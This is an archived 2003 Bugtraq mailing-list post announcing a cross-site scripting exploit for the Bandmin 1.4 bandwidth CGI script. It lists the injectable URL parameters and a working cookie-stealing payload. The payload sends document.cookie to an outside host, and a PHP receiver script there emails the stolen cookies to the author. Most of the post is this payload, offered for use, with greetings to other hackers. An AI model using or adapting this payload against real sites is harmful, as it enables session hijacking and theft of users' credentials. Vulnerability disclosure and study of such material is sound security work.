lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20030528163840.22307.qmail@www.securityfocus.com>
Date: 28 May 2003 16:38:40 -0000
From: silent needel <silentneedle@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Bandmin 1.4 XSS Exploit




Bandmin 1.4 XSS Exploit by Silent Needle

A:BACKGROUND
Bandmin is a cgi script show you the bandwidth for the sites in the server.

B:DESCRIPTION
The cross site scripting allow you to print a html or javascript or others 
in the webpage
when it just open not write in the page.

C:EXPLOIT
These are the URLs of the exploits:
1-there is two here
http://[site]/bandwidth/index.cgi?action=showmonth&year=[FIRST SCRIPT]
&month=[SECOND SCRIPT]
2-one here
http://[site]/bandwidth/index.cgi?action=showhost&month=May&year=2003&host=
[THIRD SCRIPT]

And you can steal cookie by changing [*** script] to
&lt;script&gt;document.location='http://any-web-
site/cookies.php?'+document.cookie&lt;/script&gt;
and in http://any-web-site/cookie.php put
----------------cookie.php-------------------
<?
mail("silentneedle@...mail.com","cookies from bandmin",$http_cookie);
echo $http_cookie;
?>
-----------------------------------------------

D:GREETZ
To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , OH SHE IS A LITTLE RUN 
AWAY :)

E:CONTACT
Silent Needle
silentneedle@...mail.com

F:OH LONG NIGHT
Bye

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ